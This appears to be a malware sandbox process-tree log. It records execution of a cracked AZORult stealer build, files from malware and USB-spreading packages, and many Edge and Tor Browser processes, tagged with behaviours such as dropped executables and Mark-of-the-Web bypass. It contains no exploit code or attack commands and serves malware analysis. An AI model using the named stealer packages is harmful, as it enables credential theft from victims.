"C:\Users\Admin\Desktop\TL-TROJAN-master\TL.STEALER\STEALER.Azorult\AZORult_Stealer_Full_Cracked.182d68\AZORult stealer\build.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4120

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\Temp1_D4rkDays_Malware_Package_v1.39d280.zip\Malware Package v1.0 Beta\trd.GIF
1⤵
- Modifies Internet Explorer settings
PID:3088

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\Temp1_LimeUSB.eef654.zip\LimeUSB - Malware USB Spread\By NYAN CAT.mp4"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3920

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004DC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc89413cb8,0x7ffc89413cc8,0x7ffc89413cd8
  2⤵
  PID:4732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:2492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
  2⤵
  PID:2940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:8
  2⤵
  PID:960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:2588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
  2⤵
  PID:4556
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3616 /prefetch:8
  2⤵
  PID:5072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:3464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  2⤵
  PID:4128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
  2⤵
  PID:5000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
  2⤵
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
  2⤵
  PID:1924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
  2⤵
  PID:2748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
  2⤵
  PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2628 /prefetch:1
  2⤵
  PID:1816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
  2⤵
  PID:2984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5876 /prefetch:8
  2⤵
  PID:2944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5896 /prefetch:8
  2⤵
  - Modifies registry class
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:3384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
  2⤵
  PID:3512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
  2⤵
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1
  2⤵
  PID:4068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7008 /prefetch:8
  2⤵
  PID:2748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1808 /prefetch:1
  2⤵
  PID:1884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
  2⤵
  PID:800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6492 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:2184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
  2⤵
  PID:1972
- C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.3.exe
  "C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.3.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  PID:2120
- - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1364
  - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
      "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks whether UAC is enabled
      Checks processor information in registry
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3508
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2508 -parentBuildID 20241125154204 -prefsHandle 2464 -prefMapHandle 2456 -prefsLen 21009 -prefMapSize 252047 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {72b65097-f014-449a-9584-551329534842} 3508 gpu
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2192
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1928 -childID 1 -isForBrowser -prefsHandle 2980 -prefMapHandle 2976 -prefsLen 21821 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {9aed2f88-f8aa-493c-92db-e4cd09b82b5b} 3508 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2640
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:0e22581abef3e995604c8c2417ba9cb6074fc980599753f8cad2b9066d +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 3508 DisableNetwork 1
        5⤵
        Executes dropped EXE
        
        PID:5016
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3272 -childID 2 -isForBrowser -prefsHandle 3248 -prefMapHandle 3244 -prefsLen 22589 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {c4812eaa-00f0-42e3-8994-31fd523391ff} 3508 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2444
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3440 -childID 3 -isForBrowser -prefsHandle 3448 -prefMapHandle 3452 -prefsLen 22702 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {da79d609-eb03-4974-989e-f9d291565ddf} 3508 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5280
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3632 -parentBuildID 20241125154204 -prefsHandle 3660 -prefMapHandle 3656 -prefsLen 23128 -prefMapSize 252047 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {c9e5d351-2b89-45b6-bdea-7542291f8c6e} 3508 rdd
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5752
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=4112 -parentBuildID 20241125154204 -sandboxingKind 0 -prefsHandle 3228 -prefMapHandle 3540 -prefsLen 25490 -prefMapSize 252047 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {0764264c-dd6f-405e-bb4b-67e11762c3aa} 3508 utility
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4228
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1876 -childID 4 -isForBrowser -prefsHandle 4312 -prefMapHandle 4308 -prefsLen 24349 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {196b67c2-2123-49b8-8a3d-b46cc67c33d8} 3508 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5780
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=4396 -childID 5 -isForBrowser -prefsHandle 4456 -prefMapHandle 4408 -prefsLen 24349 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {cae78618-026b-4939-8b07-f82302d04e9e} 3508 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5916
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=4576 -childID 6 -isForBrowser -prefsHandle 1876 -prefMapHandle 1668 -prefsLen 24349 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ec4a077e-cced-4522-b6d6-bb13c2b42f8b} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:2644
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2100 -childID 7 -isForBrowser -prefsHandle 3296 -prefMapHandle 3284 -prefsLen 25971 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a0767893-b159-41e3-8b72-3a032c455a7c} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:5680
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2300 -childID 8 -isForBrowser -prefsHandle 3348 -prefMapHandle 3336 -prefsLen 24634 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {8b5d7f67-3aeb-4890-95ec-b61e538ec28c} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:5376
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=5160 -childID 9 -isForBrowser -prefsHandle 5152 -prefMapHandle 1472 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {90c9fd77-58fa-4dfc-b853-305def1a79f0} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:5624
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=5560 -childID 10 -isForBrowser -prefsHandle 5432 -prefMapHandle 5552 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7d4c9101-e9e5-4bd8-bc16-927ea04ea8bf} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:4948
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=6788 -childID 11 -isForBrowser -prefsHandle 5844 -prefMapHandle 5840 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ab71e582-3275-4298-9f45-beab54a987d7} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:1424
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=7120 -childID 12 -isForBrowser -prefsHandle 7280 -prefMapHandle 7276 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {b0f37311-6849-446c-8171-4b36e1113108} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:5208
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=7032 -childID 13 -isForBrowser -prefsHandle 7792 -prefMapHandle 7704 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {147265c6-eb4e-4139-9c1d-af078f1530fe} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:6788
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=7028 -childID 14 -isForBrowser -prefsHandle 8428 -prefMapHandle 8452 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {cfd4aea1-d9de-4487-a366-5ff35a0dc142} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:6816
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=8468 -childID 15 -isForBrowser -prefsHandle 8348 -prefMapHandle 8340 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {90b46da4-2e20-4448-85e5-7214274df3af} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:6844
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=8476 -childID 16 -isForBrowser -prefsHandle 8328 -prefMapHandle 8332 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {4bb10b54-3edf-4189-bf74-a6b93159fce8} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:6872
